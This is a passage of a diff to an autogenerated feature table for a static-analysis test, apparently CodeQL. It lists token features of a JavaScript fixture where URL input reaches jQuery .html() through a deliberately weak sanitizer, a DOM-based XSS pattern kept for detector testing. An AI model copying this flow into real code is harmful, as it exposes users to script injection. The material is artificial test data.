autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:18:38:23 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:18:38:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:18:38:23 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:18:38:23 | target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:18:38:23 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:3 | $ | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:3 | $ | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | exceptional return of $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:16 | $('myId').html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:16 | $('myId').html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | $('myId ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | $('myId ... inted3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | $('myId ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | $('myId ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | $('myId ... inted3) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | exceptional return of $('myId ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | exceptional return of $('myId ... inted3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | exceptional return of $('myId ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | exceptional return of $('myId ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:3:39:26 | exceptional return of $('myId ... inted3) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14499,6 +105335,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:5:39:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:13:39:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:13:39:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:13:39:16 | html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:13:39:16 | html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:13:39:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14506,6 +105347,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:39:18:39:25 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:40:7:40:14 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:40:7:40:14 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:40:7:40:14 | sanitize | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:40:7:40:14 | sanitize | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:40:7:40:14 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:12 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:12 | tainted3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:12 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:12 | tainted3 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:12 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted3 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted ... inted3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:5:41:36 | tainted ... inted3) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:26 | sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:26 | sanitizeBad | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:26 | sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:26 | sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:26 | sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | exceptional return of sanitiz ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | exceptional return of sanitiz ... inted3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | exceptional return of sanitiz ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | exceptional return of sanitiz ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | exceptional return of sanitiz ... inted3) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | CalleeFlexibleAccessPath | sanitizeBad | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14513,6 +105389,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:41:28:41:35 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | $ | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | $ | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | tainted3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | tainted3 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:3 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | exceptional return of $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:16 | $('myId').html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:16 | $('myId').html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | $('myId ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | $('myId ... inted3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | $('myId ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | $('myId ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | $('myId ... inted3) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | exceptional return of $('myId ... inted3) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | exceptional return of $('myId ... inted3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | exceptional return of $('myId ... inted3) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | exceptional return of $('myId ... inted3) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:3:43:26 | exceptional return of $('myId ... inted3) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14520,6 +105431,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:5:43:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:13:43:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:13:43:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:13:43:16 | html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:13:43:16 | html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:13:43:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14527,6 +105443,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:43:18:43:25 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:3 | $ | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:3 | $ | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | exceptional return of $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:45:3:45:16 | $('myId').html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| 